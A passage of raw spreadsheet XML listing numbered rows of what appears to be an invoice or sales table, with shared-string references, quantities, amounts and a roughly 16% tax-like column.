    </row>
    <row r="1230" spans="2:11">
      <c r="B1230" s="9">
        <v>1264</v>
      </c>
      <c r="C1230" s="238" t="s">
        <v>8014</v>
      </c>
      <c r="D1230" s="238" t="s">
        <v>8015</v>
      </c>
      <c r="E1230" s="238" t="s">
        <v>8016</v>
      </c>
      <c r="F1230" s="238" t="s">
        <v>8017</v>
      </c>
      <c r="G1230" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1230" s="10">
        <v>58</v>
      </c>
      <c r="I1230" s="14">
        <v>5068.17</v>
      </c>
      <c r="J1230" s="15">
        <v>810.8864</v>
      </c>
      <c r="K1230" s="16"/>
    </row>
    <row r="1231" spans="2:11">
      <c r="B1231" s="9">
        <v>1265</v>
      </c>
      <c r="C1231" s="238" t="s">
        <v>8018</v>
      </c>
      <c r="D1231" s="238" t="s">
        <v>8019</v>
      </c>
      <c r="E1231" s="238" t="s">
        <v>8020</v>
      </c>
      <c r="F1231" s="238" t="s">
        <v>8021</v>
      </c>
      <c r="G1231" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1231" s="10">
        <v>1</v>
      </c>
      <c r="I1231" s="14">
        <v>306.33</v>
      </c>
      <c r="J1231" s="15">
        <v>49.0128</v>
      </c>
      <c r="K1231" s="16"/>
    </row>
    <row r="1232" spans="2:11">
      <c r="B1232" s="9">
        <v>1266</v>
      </c>
      <c r="C1232" s="238" t="s">
        <v>8022</v>
      </c>
      <c r="D1232" s="238" t="s">
        <v>8023</v>
      </c>
      <c r="E1232" s="238" t="s">
        <v>4750</v>
      </c>
      <c r="F1232" s="238" t="s">
        <v>8024</v>
      </c>
      <c r="G1232" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1232" s="10">
        <v>6</v>
      </c>
      <c r="I1232" s="14">
        <v>291.93</v>
      </c>
      <c r="J1232" s="15">
        <v>46.7136</v>
      </c>
      <c r="K1232" s="16"/>
    </row>
    <row r="1233" spans="2:11">
      <c r="B1233" s="9">
        <v>1267</v>
      </c>
      <c r="C1233" s="238" t="s">
        <v>8025</v>
      </c>
      <c r="D1233" s="238" t="s">
        <v>8026</v>
      </c>
      <c r="E1233" s="238" t="s">
        <v>7227</v>
      </c>
      <c r="F1233" s="238" t="s">
        <v>8027</v>
      </c>
      <c r="G1233" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1233" s="10">
        <v>140</v>
      </c>
      <c r="I1233" s="14">
        <v>162.4</v>
      </c>
      <c r="J1233" s="15">
        <v>25.984</v>
      </c>
      <c r="K1233" s="16"/>
    </row>
    <row r="1234" spans="2:11">
      <c r="B1234" s="9">
        <v>1268</v>
      </c>
      <c r="C1234" s="238" t="s">
        <v>8028</v>
      </c>
      <c r="D1234" s="238" t="s">
        <v>8029</v>
      </c>
      <c r="E1234" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F1234" s="238" t="s">
        <v>8030</v>
      </c>
      <c r="G1234" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1234" s="10">
        <v>19</v>
      </c>
      <c r="I1234" s="14">
        <v>379.73</v>
      </c>
      <c r="J1234" s="15">
        <v>60.7696</v>
      </c>
      <c r="K1234" s="16"/>
    </row>
    <row r="1235" spans="2:11">
      <c r="B1235" s="9">
        <v>1269</v>
      </c>
      <c r="C1235" s="238" t="s">
        <v>8031</v>
      </c>
      <c r="D1235" s="238" t="s">
        <v>8032</v>
      </c>
      <c r="E1235" s="238" t="s">
        <v>8033</v>
      </c>
      <c r="F1235" s="238" t="s">
        <v>8034</v>
      </c>
      <c r="G1235" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1235" s="10">
        <v>8</v>
      </c>
      <c r="I1235" s="14">
        <v>1154.8</v>
      </c>
      <c r="J1235" s="15">
        <v>184.768</v>
      </c>
      <c r="K1235" s="16"/>
    </row>
    <row r="1236" spans="2:11">
      <c r="B1236" s="9">
        <v>1270</v>
      </c>
      <c r="C1236" s="238" t="s">
        <v>8035</v>
      </c>
      <c r="D1236" s="238" t="s">
        <v>8036</v>
      </c>
      <c r="E1236" s="238" t="s">
        <v>8037</v>
      </c>
      <c r="F1236" s="238" t="s">
        <v>8038</v>
      </c>
      <c r="G1236" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1236" s="10">
        <v>1</v>
      </c>
      <c r="I1236" s="14">
        <v>1538.46</v>
      </c>
      <c r="J1236" s="15">
        <v>246.1536</v>
      </c>
      <c r="K1236" s="16"/>
    </row>
    <row r="1237" spans="2:11">
      <c r="B1237" s="9">
        <v>1271</v>
      </c>
      <c r="C1237" s="238" t="s">
        <v>8039</v>
      </c>
      <c r="D1237" s="238" t="s">
        <v>8040</v>
      </c>
      <c r="E1237" s="238" t="s">
        <v>8041</v>
      </c>
      <c r="F1237" s="238" t="s">
        <v>8042</v>
      </c>
      <c r="G1237" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1237" s="10">
        <v>3</v>
      </c>
      <c r="I1237" s="14">
        <v>983.4</v>
      </c>
      <c r="J1237" s="15">
        <v>157.344</v>
      </c>
      <c r="K1237" s="16"/>
    </row>
    <row r="1238" spans="2:11">
      <c r="B1238" s="9">
        <v>1272</v>
      </c>
      <c r="C1238" s="238" t="s">
        <v>8043</v>
      </c>
      <c r="D1238" s="238" t="s">
        <v>8044</v>
      </c>
      <c r="E1238" s="238" t="s">
        <v>7796</v>
      </c>
      <c r="F1238" s="238" t="s">
        <v>8045</v>
      </c>
      <c r="G1238" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1238" s="10">
        <v>372</v>
      </c>
      <c r="I1238" s="14">
        <v>23031.4</v>
      </c>
      <c r="J1238" s="15">
        <v>3684.8832</v>
      </c>
      <c r="K1238" s="16"/>
    </row>
    <row r="1239" spans="2:11">
      <c r="B1239" s="9">
        <v>1273</v>
      </c>
      <c r="C1239" s="238" t="s">
        <v>8046</v>
      </c>
      <c r="D1239" s="238" t="s">
        <v>8047</v>
      </c>
      <c r="E1239" s="238" t="s">
        <v>8048</v>
      </c>
      <c r="F1239" s="238" t="s">
        <v>8049</v>
      </c>
      <c r="G1239" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1239" s="10">
        <v>2</v>
      </c>
      <c r="I1239" s="14">
        <v>28</v>
      </c>
      <c r="J1239" s="15">
        <v>4.48</v>
      </c>
      <c r="K1239" s="16"/>
    </row>
    <row r="1240" spans="2:11">
      <c r="B1240" s="9">
        <v>1274</v>
      </c>
      <c r="C1240" s="238" t="s">
        <v>8050</v>
      </c>
      <c r="D1240" s="238" t="s">
        <v>8051</v>
      </c>
      <c r="E1240" s="238" t="s">
        <v>8048</v>
      </c>
      <c r="F1240" s="238" t="s">
        <v>8052</v>
      </c>
      <c r="G1240" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1240" s="10">
        <v>11</v>
      </c>
      <c r="I1240" s="14">
        <v>1382.42</v>
      </c>
      <c r="J1240" s="15">
        <v>221.1792</v>
      </c>
      <c r="K1240" s="16"/>
    </row>
    <row r="1241" spans="2:11">
      <c r="B1241" s="9">
        <v>1275</v>
      </c>
      <c r="C1241" s="238" t="s">
        <v>8053</v>
      </c>
      <c r="D1241" s="238" t="s">
        <v>8054</v>
      </c>
      <c r="E1241" s="238" t="s">
        <v>8048</v>
      </c>
      <c r="F1241" s="238" t="s">
        <v>8055</v>
      </c>
      <c r="G1241" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1241" s="10">
        <v>2</v>
      </c>
      <c r="I1241" s="14">
        <v>244.8</v>
      </c>
      <c r="J1241" s="15">
        <v>39.168</v>
      </c>
      <c r="K1241" s="16"/>
    </row>
    <row r="1242" spans="2:11">
      <c r="B1242" s="9">
        <v>1276</v>
      </c>
      <c r="C1242" s="238" t="s">
        <v>8056</v>
      </c>
      <c r="D1242" s="238" t="s">
        <v>8057</v>
      </c>
      <c r="E1242" s="238" t="s">
        <v>8058</v>
      </c>
      <c r="F1242" s="238" t="s">
        <v>8059</v>
      </c>
      <c r="G1242" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1242" s="10">
        <v>6</v>
      </c>
      <c r="I1242" s="14">
        <v>645.12</v>
      </c>
      <c r="J1242" s="15">
        <v>103.2192</v>
      </c>
      <c r="K1242" s="16"/>
    </row>
    <row r="1243" spans="2:11">
      <c r="B1243" s="9">
        <v>1277</v>
      </c>
      <c r="C1243" s="238" t="s">
        <v>8060</v>
      </c>
      <c r="D1243" s="238" t="s">
        <v>8061</v>
      </c>
      <c r="E1243" s="238" t="s">
        <v>7800</v>
      </c>
      <c r="F1243" s="238" t="s">
        <v>8062</v>
      </c>
      <c r="G1243" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1243" s="10">
        <v>11</v>
      </c>
      <c r="I1243" s="14">
        <v>142.2</v>
      </c>
      <c r="J1243" s="15">
        <v>22.7568</v>
      </c>
      <c r="K1243" s="16"/>
    </row>
    <row r="1244" spans="2:11">
      <c r="B1244" s="9">
        <v>1278</v>
      </c>
      <c r="C1244" s="238" t="s">
        <v>8063</v>
      </c>
      <c r="D1244" s="238" t="s">
        <v>7226</v>
      </c>
      <c r="E1244" s="238" t="s">
        <v>7227</v>
      </c>
      <c r="F1244" s="9"/>
      <c r="G1244" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1244" s="10">
        <v>163</v>
      </c>
      <c r="I1244" s="14">
        <v>159.69</v>
      </c>
      <c r="J1244" s="15">
        <v>25.5584</v>
      </c>
      <c r="K1244" s="16"/>
    </row>
    <row r="1245" spans="2:11">
      <c r="B1245" s="9">
        <v>1279</v>
      </c>
      <c r="C1245" s="238" t="s">
        <v>8064</v>
      </c>
      <c r="D1245" s="238" t="s">
        <v>8065</v>
      </c>
      <c r="E1245" s="238" t="s">
        <v>8066</v>
      </c>
      <c r="F1245" s="9"/>
      <c r="G1245" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1245" s="10">
        <v>1</v>
      </c>
      <c r="I1245" s="14">
        <v>0.66</v>
      </c>
      <c r="J1245" s="15">
        <v>0.1056</v>
      </c>
      <c r="K1245" s="16"/>
    </row>
    <row r="1246" spans="2:11">
      <c r="B1246" s="9">
        <v>1280</v>
      </c>
      <c r="C1246" s="238" t="s">
        <v>8067</v>
      </c>
      <c r="D1246" s="238" t="s">
        <v>8068</v>
      </c>
      <c r="E1246" s="238" t="s">
        <v>8069</v>
      </c>
      <c r="F1246" s="238" t="s">
        <v>8070</v>
      </c>
      <c r="G1246" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1246" s="10">
        <v>1</v>
      </c>
      <c r="I1246" s="14">
        <v>279.44</v>
      </c>
      <c r="J1246" s="15">
        <v>44.7104</v>
      </c>
      <c r="K1246" s="16"/>
    </row>
    <row r="1247" spans="2:11">
      <c r="B1247" s="9">
        <v>1281</v>
      </c>
      <c r="C1247" s="238" t="s">
        <v>8071</v>
      </c>
      <c r="D1247" s="238" t="s">
        <v>8072</v>
      </c>
      <c r="E1247" s="238" t="s">
        <v>7399</v>
      </c>
      <c r="F1247" s="238" t="s">
        <v>8073</v>
      </c>
      <c r="G1247" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1247" s="10">
        <v>3</v>
      </c>
      <c r="I1247" s="14">
        <v>35.99</v>
      </c>
      <c r="J1247" s="15">
        <v>5.76</v>
      </c>
      <c r="K1247" s="16"/>
    </row>
    <row r="1248" spans="2:11">
      <c r="B1248" s="9">
        <v>1282</v>
      </c>
      <c r="C1248" s="238" t="s">
        <v>8074</v>
      </c>
      <c r="D1248" s="238" t="s">
        <v>8075</v>
      </c>
      <c r="E1248" s="238" t="s">
        <v>6586</v>
      </c>
      <c r="F1248" s="238" t="s">
        <v>8013</v>
      </c>
      <c r="G1248" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1248" s="10">
        <v>1</v>
      </c>
      <c r="I1248" s="14">
        <v>105.02</v>
      </c>
      <c r="J1248" s="15">
        <v>16.8032</v>
      </c>
      <c r="K1248" s="16"/>
    </row>
    <row r="1249" spans="2:11">
      <c r="B1249" s="9">
        <v>1283</v>
      </c>
      <c r="C1249" s="238" t="s">
        <v>8076</v>
      </c>
      <c r="D1249" s="238" t="s">
        <v>8077</v>
      </c>
      <c r="E1249" s="238" t="s">
        <v>3907</v>
      </c>
      <c r="F1249" s="238" t="s">
        <v>7854</v>
      </c>
      <c r="G1249" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1249" s="10">
        <v>1</v>
      </c>
      <c r="I1249" s="14">
        <v>5425.64</v>
      </c>
      <c r="J1249" s="15">
        <v>868.1024</v>
      </c>
      <c r="K1249" s="16"/>
    </row>
    <row r="1250" spans="2:11">
      <c r="B1250" s="9">
        <v>1284</v>
      </c>
      <c r="C1250" s="238" t="s">
        <v>8078</v>
      </c>
      <c r="D1250" s="238" t="s">
        <v>8079</v>
      </c>
      <c r="E1250" s="238" t="s">
        <v>7846</v>
      </c>
      <c r="F1250" s="238" t="s">
        <v>8080</v>
      </c>
      <c r="G1250" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1250" s="10">
        <v>1</v>
      </c>
      <c r="I1250" s="14">
        <v>5555.56</v>
      </c>
      <c r="J1250" s="15">
        <v>888.8896</v>
      </c>
      <c r="K1250" s="16"/>
    </row>
    <row r="1251" spans="2:11">
      <c r="B1251" s="9">
        <v>1285</v>
      </c>
      <c r="C1251" s="238" t="s">
        <v>8081</v>
      </c>
      <c r="D1251" s="238" t="s">
        <v>8082</v>
      </c>
      <c r="E1251" s="238" t="s">
        <v>7829</v>
      </c>
      <c r="F1251" s="238" t="s">
        <v>7850</v>
      </c>
      <c r="G1251" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1251" s="10">
        <v>1</v>
      </c>
      <c r="I1251" s="14">
        <v>5401.71</v>
      </c>
      <c r="J1251" s="15">
        <v>864.2736</v>
      </c>
      <c r="K1251" s="16"/>
    </row>
    <row r="1252" spans="2:11">
      <c r="B1252" s="9">
        <v>1286</v>
      </c>
      <c r="C1252" s="238" t="s">
        <v>8083</v>
      </c>
      <c r="D1252" s="238" t="s">
        <v>8084</v>
      </c>
      <c r="E1252" s="238" t="s">
        <v>3856</v>
      </c>
      <c r="F1252" s="238" t="s">
        <v>7735</v>
      </c>
      <c r="G1252" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1252" s="10">
        <v>1</v>
      </c>
      <c r="I1252" s="14">
        <v>641.03</v>
      </c>
      <c r="J1252" s="15">
        <v>102.5648</v>
      </c>
      <c r="K1252" s="16"/>
    </row>
    <row r="1253" spans="2:11">
      <c r="B1253" s="9">
        <v>1287</v>
      </c>
      <c r="C1253" s="238" t="s">
        <v>8085</v>
      </c>
      <c r="D1253" s="238" t="s">
        <v>8086</v>
      </c>
      <c r="E1253" s="238" t="s">
        <v>7896</v>
      </c>
      <c r="F1253" s="238" t="s">
        <v>7877</v>
      </c>
      <c r="G1253" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1253" s="10">
        <v>1</v>
      </c>
      <c r="I1253" s="14">
        <v>4786.32</v>
      </c>
      <c r="J1253" s="15">
        <v>765.8112</v>
      </c>
      <c r="K1253" s="16"/>
    </row>
    <row r="1254" spans="2:11">
      <c r="B1254" s="9">
        <v>1288</v>
      </c>
      <c r="C1254" s="238" t="s">
        <v>8087</v>
      </c>
      <c r="D1254" s="238" t="s">
        <v>8088</v>
      </c>
      <c r="E1254" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F1254" s="238" t="s">
        <v>7836</v>
      </c>
      <c r="G1254" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1254" s="10">
        <v>2</v>
      </c>
      <c r="I1254" s="14">
        <v>1437.55</v>
      </c>
      <c r="J1254" s="15">
        <v>230.0096</v>
      </c>
      <c r="K1254" s="16"/>
    </row>
    <row r="1255" spans="2:11">
      <c r="B1255" s="9">
        <v>1289</v>
      </c>
      <c r="C1255" s="238" t="s">
        <v>8089</v>
      </c>
      <c r="D1255" s="238" t="s">
        <v>7842</v>
      </c>
      <c r="E1255" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F1255" s="238" t="s">
        <v>7843</v>
      </c>
      <c r="G1255" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1255" s="10">
        <v>12</v>
      </c>
      <c r="I1255" s="14">
        <v>2908.86</v>
      </c>
      <c r="J1255" s="15">
        <v>465.4272</v>
      </c>
      <c r="K1255" s="16"/>
    </row>
    <row r="1256" spans="2:11">
      <c r="B1256" s="9">
        <v>1290</v>
      </c>
      <c r="C1256" s="238" t="s">
        <v>8090</v>
      </c>
      <c r="D1256" s="238" t="s">
        <v>8091</v>
      </c>
      <c r="E1256" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F1256" s="238" t="s">
        <v>7830</v>
      </c>
      <c r="G1256" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1256" s="10">
        <v>6</v>
      </c>
      <c r="I1256" s="14">
        <v>707.67</v>
      </c>
      <c r="J1256" s="15">
        <v>113.232</v>
      </c>
      <c r="K1256" s="16"/>
    </row>
    <row r="1257" spans="2:11">
      <c r="B1257" s="9">
        <v>1291</v>
      </c>
      <c r="C1257" s="238" t="s">
        <v>8092</v>
      </c>
      <c r="D1257" s="238" t="s">
        <v>8093</v>
      </c>
      <c r="E1257" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F1257" s="238" t="s">
        <v>7958</v>
      </c>
      <c r="G1257" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1257" s="10">
        <v>16</v>
      </c>
      <c r="I1257" s="14">
        <v>850.17</v>
      </c>
      <c r="J1257" s="15">
        <v>136.0384</v>
      </c>
      <c r="K1257" s="16"/>
    </row>
    <row r="1258" spans="2:11">
      <c r="B1258" s="9">
        <v>1292</v>
      </c>
      <c r="C1258" s="238" t="s">
        <v>8094</v>
      </c>
      <c r="D1258" s="238" t="s">
        <v>8095</v>
      </c>
      <c r="E1258" s="238" t="s">
        <v>7796</v>
      </c>
      <c r="F1258" s="238" t="s">
        <v>7858</v>
      </c>
      <c r="G1258" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1258" s="10">
        <v>3</v>
      </c>
      <c r="I1258" s="14">
        <v>2384.62</v>
      </c>
      <c r="J1258" s="15">
        <v>381.5376</v>
      </c>
      <c r="K1258" s="16"/>
    </row>
    <row r="1259" spans="2:11">
      <c r="B1259" s="9">
        <v>1293</v>
      </c>
      <c r="C1259" s="238" t="s">
        <v>8096</v>
      </c>
      <c r="D1259" s="238" t="s">
        <v>8097</v>
      </c>
      <c r="E1259" s="238" t="s">
        <v>7796</v>
      </c>
      <c r="F1259" s="238" t="s">
        <v>7847</v>
      </c>
      <c r="G1259" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1259" s="10">
        <v>2</v>
      </c>
      <c r="I1259" s="14">
        <v>778.69</v>
      </c>
      <c r="J1259" s="15">
        <v>124.592</v>
      </c>
      <c r="K1259" s="16"/>
    </row>
    <row r="1260" spans="2:11">
      <c r="B1260" s="9">
        <v>1294</v>
      </c>
      <c r="C1260" s="238" t="s">
        <v>8098</v>
      </c>
      <c r="D1260" s="238" t="s">
        <v>8099</v>
      </c>
      <c r="E1260" s="238" t="s">
        <v>7796</v>
      </c>
      <c r="F1260" s="238" t="s">
        <v>7753</v>
      </c>
      <c r="G1260" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1260" s="10">
        <v>5</v>
      </c>
      <c r="I1260" s="14">
        <v>1439.87</v>
      </c>
      <c r="J1260" s="15">
        <v>230.376</v>
      </c>
      <c r="K1260" s="16"/>
    </row>
    <row r="1261" spans="2:11">
      <c r="B1261" s="9">
        <v>1295</v>
      </c>
      <c r="C1261" s="238" t="s">
        <v>8100</v>
      </c>
      <c r="D1261" s="238" t="s">
        <v>8101</v>
      </c>
      <c r="E1261" s="238" t="s">
        <v>7634</v>
      </c>
      <c r="F1261" s="238" t="s">
        <v>8102</v>
      </c>
      <c r="G1261" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1261" s="10">
        <v>1</v>
      </c>
      <c r="I1261" s="14">
        <v>1156.49</v>
      </c>
      <c r="J1261" s="15">
        <v>185.0384</v>
      </c>
      <c r="K1261" s="16"/>
    </row>
    <row r="1262" spans="2:11">
      <c r="B1262" s="9">
        <v>1296</v>
      </c>
      <c r="C1262" s="238" t="s">
        <v>8103</v>
      </c>
      <c r="D1262" s="238" t="s">
        <v>8104</v>
      </c>
      <c r="E1262" s="238" t="s">
        <v>7638</v>
      </c>
      <c r="F1262" s="238" t="s">
        <v>8105</v>
      </c>
      <c r="G1262" s="237" t="s">
        <v>3867</v>
      </c>
      <c r="H1262" s="10">
        <v>4</v>
      </c>
      <c r="I1262" s="14">
        <v>4398.75</v>
      </c>
      <c r="J1262" s="15">
        <v>703.8016</v>
      </c>
      <c r="K1262" s="16"/>
    </row>
    <row r="1263" spans="2:11">
      <c r="B1263" s="9">
        <v>1297</v>
      </c>
      <c r="C1263" s="238" t="s">
        <v>8106</v>
      </c>
      <c r="D1263" s="238" t="s">
        <v>8107</v>
      </c>
      <c r="E1263" s="238" t="s">
        <v>7644</v>
      </c>
      <c r="F1263" s="238" t="s">
        <v>8108</v>
      </c>
      <c r="G1263" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1263" s="10">
        <v>14</v>
      </c>
      <c r="I1263" s="14">
        <v>12403.65</v>
      </c>
      <c r="J1263" s="15">
        <v>1984.5952</v>
      </c>
      <c r="K1263" s="16"/>
    </row>
    <row r="1264" spans="2:11">
      <c r="B1264" s="9">
        <v>1298</v>
      </c>
      <c r="C1264" s="238" t="s">
        <v>8109</v>
      </c>
      <c r="D1264" s="238" t="s">
        <v>8110</v>
      </c>
      <c r="E1264" s="238" t="s">
        <v>7644</v>
      </c>
      <c r="F1264" s="238" t="s">
        <v>8111</v>
      </c>
      <c r="G1264" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1264" s="10">
        <v>16</v>
      </c>
      <c r="I1264" s="14">
        <v>11441.52</v>
      </c>
      <c r="J1264" s="15">
        <v>1830.656</v>
      </c>
      <c r="K1264" s="16"/>
    </row>
    <row r="1265" spans="2:11">
      <c r="B1265" s="9">
        <v>1299</v>
      </c>
      <c r="C1265" s="238" t="s">
        <v>8112</v>
      </c>
      <c r="D1265" s="238" t="s">
        <v>8113</v>
      </c>
      <c r="E1265" s="238" t="s">
        <v>8114</v>
      </c>
      <c r="F1265" s="238" t="s">
        <v>8115</v>
      </c>
      <c r="G1265" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1265" s="10">
        <v>1</v>
      </c>
      <c r="I1265" s="14">
        <v>864.96</v>
      </c>
      <c r="J1265" s="15">
        <v>138.3936</v>
      </c>
      <c r="K1265" s="16"/>
    </row>
    <row r="1266" spans="2:11">
      <c r="B1266" s="9">
        <v>1300</v>
      </c>
      <c r="C1266" s="238" t="s">
        <v>8116</v>
      </c>
      <c r="D1266" s="238" t="s">
        <v>8117</v>
      </c>
      <c r="E1266" s="238" t="s">
        <v>7221</v>
      </c>
      <c r="F1266" s="238" t="s">
        <v>7965</v>
      </c>
      <c r="G1266" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1266" s="10">
        <v>25</v>
      </c>
      <c r="I1266" s="14">
        <v>2601.32</v>
      </c>
      <c r="J1266" s="15">
        <v>416.2</v>
      </c>
      <c r="K1266" s="16"/>
    </row>
    <row r="1267" spans="2:11">
      <c r="B1267" s="9">
        <v>1301</v>
      </c>
      <c r="C1267" s="238" t="s">
        <v>8118</v>
      </c>
      <c r="D1267" s="238" t="s">
        <v>7737</v>
      </c>
      <c r="E1267" s="238" t="s">
        <v>5311</v>
      </c>
      <c r="F1267" s="238" t="s">
        <v>7738</v>
      </c>
      <c r="G1267" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1267" s="10">
        <v>2</v>
      </c>
      <c r="I1267" s="14">
        <v>294.02</v>
      </c>
      <c r="J1267" s="15">
        <v>117.608</v>
      </c>
      <c r="K1267" s="16"/>
    </row>
    <row r="1268" spans="2:11">
      <c r="B1268" s="9">
        <v>1302</v>
      </c>
      <c r="C1268" s="238" t="s">
        <v>8119</v>
      </c>
      <c r="D1268" s="238" t="s">
        <v>7936</v>
      </c>
      <c r="E1268" s="238" t="s">
        <v>7741</v>
      </c>
      <c r="F1268" s="9"/>
      <c r="G1268" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1268" s="10">
        <v>1</v>
      </c>
      <c r="I1268" s="14">
        <v>549.76</v>
      </c>
      <c r="J1268" s="15">
        <v>87.9616</v>
      </c>
      <c r="K1268" s="16"/>
    </row>
    <row r="1269" spans="2:11">
      <c r="B1269" s="9">
        <v>1303</v>
      </c>
      <c r="C1269" s="238" t="s">
        <v>8120</v>
      </c>
      <c r="D1269" s="238" t="s">
        <v>8121</v>
      </c>
      <c r="E1269" s="238" t="s">
        <v>7839</v>
      </c>
      <c r="F1269" s="238" t="s">
        <v>8122</v>
      </c>
      <c r="G1269" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1269" s="10">
        <v>1</v>
      </c>
      <c r="I1269" s="14">
        <v>2021.6</v>
      </c>
      <c r="J1269" s="15">
        <v>323.456</v>
      </c>
      <c r="K1269" s="16"/>
    </row>
    <row r="1270" spans="2:11">
      <c r="B1270" s="9">
        <v>1304</v>
      </c>
      <c r="C1270" s="238" t="s">
        <v>8123</v>
      </c>
      <c r="D1270" s="238" t="s">
        <v>8124</v>
      </c>
      <c r="E1270" s="238" t="s">
        <v>4753</v>
      </c>
      <c r="F1270" s="238" t="s">
        <v>7954</v>
      </c>
      <c r="G1270" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1270" s="10">
        <v>50</v>
      </c>
      <c r="I1270" s="14">
        <v>6000</v>
      </c>
      <c r="J1270" s="15">
        <v>960</v>
      </c>
      <c r="K1270" s="16"/>
    </row>
    <row r="1271" spans="2:11">
      <c r="B1271" s="9">
        <v>1305</v>
      </c>
      <c r="C1271" s="238" t="s">
        <v>8125</v>
      </c>
      <c r="D1271" s="238" t="s">
        <v>8126</v>
      </c>
      <c r="E1271" s="238" t="s">
        <v>7227</v>
      </c>
      <c r="F1271" s="238" t="s">
        <v>8127</v>
      </c>
      <c r="G1271" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1271" s="10">
        <v>242</v>
      </c>
      <c r="I1271" s="14">
        <v>1246.36</v>
      </c>
      <c r="J1271" s="15">
        <v>199.408</v>
      </c>
      <c r="K1271" s="16"/>
    </row>
    <row r="1272" spans="2:11">
      <c r="B1272" s="9">
        <v>1306</v>
      </c>
      <c r="C1272" s="238" t="s">
        <v>8128</v>
      </c>
      <c r="D1272" s="238" t="s">
        <v>8129</v>
      </c>
      <c r="E1272" s="238" t="s">
        <v>5354</v>
      </c>
      <c r="F1272" s="238" t="s">
        <v>8130</v>
      </c>
      <c r="G1272" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1272" s="10">
        <v>1900</v>
      </c>
      <c r="I1272" s="14">
        <v>2239.27</v>
      </c>
      <c r="J1272" s="15">
        <v>358.72</v>
      </c>
      <c r="K1272" s="16"/>
    </row>
    <row r="1273" spans="2:11">
      <c r="B1273" s="9">
        <v>1307</v>
      </c>
      <c r="C1273" s="238" t="s">
        <v>8131</v>
      </c>
      <c r="D1273" s="238" t="s">
        <v>8132</v>
      </c>
      <c r="E1273" s="238" t="s">
        <v>6985</v>
      </c>
      <c r="F1273" s="9"/>
      <c r="G1273" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1273" s="10">
        <v>15</v>
      </c>
      <c r="I1273" s="14">
        <v>1344.35</v>
      </c>
      <c r="J1273" s="15">
        <v>537.72</v>
      </c>
      <c r="K1273" s="16"/>
    </row>
    <row r="1274" spans="2:11">
      <c r="B1274" s="9">
        <v>1308</v>
      </c>
      <c r="C1274" s="238" t="s">
        <v>8133</v>
      </c>
      <c r="D1274" s="238" t="s">
        <v>8134</v>
      </c>
      <c r="E1274" s="238" t="s">
        <v>7227</v>
      </c>
      <c r="F1274" s="238" t="s">
        <v>8135</v>
      </c>
      <c r="G1274" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1274" s="10">
        <v>80</v>
      </c>
      <c r="I1274" s="14">
        <v>124.48</v>
      </c>
      <c r="J1274" s="15">
        <v>19.968</v>
      </c>
      <c r="K1274" s="16"/>
    </row>
    <row r="1275" spans="2:11">
      <c r="B1275" s="9">
        <v>1309</v>
      </c>
      <c r="C1275" s="238" t="s">
        <v>8136</v>
      </c>
      <c r="D1275" s="238" t="s">
        <v>8137</v>
      </c>
      <c r="E1275" s="238" t="s">
        <v>8138</v>
      </c>
      <c r="F1275" s="9"/>
      <c r="G1275" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1275" s="10">
        <v>17</v>
      </c>
      <c r="I1275" s="14">
        <v>305.49</v>
      </c>
      <c r="J1275" s="15">
        <v>48.8784</v>
      </c>
      <c r="K1275" s="16"/>
    </row>
    <row r="1276" spans="2:11">
      <c r="B1276" s="9">
        <v>1310</v>
      </c>
      <c r="C1276" s="238" t="s">
        <v>8139</v>
      </c>
      <c r="D1276" s="238" t="s">
        <v>8140</v>
      </c>
      <c r="E1276" s="238" t="s">
        <v>7796</v>
      </c>
      <c r="F1276" s="238" t="s">
        <v>8141</v>
      </c>
      <c r="G1276" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1276" s="10">
        <v>2</v>
      </c>
      <c r="I1276" s="14">
        <v>408.88</v>
      </c>
      <c r="J1276" s="15">
        <v>65.4208</v>
      </c>
      <c r="K1276" s="16"/>
    </row>
    <row r="1277" spans="2:11">
      <c r="B1277" s="9">
        <v>1311</v>
      </c>
      <c r="C1277" s="238" t="s">
        <v>8142</v>
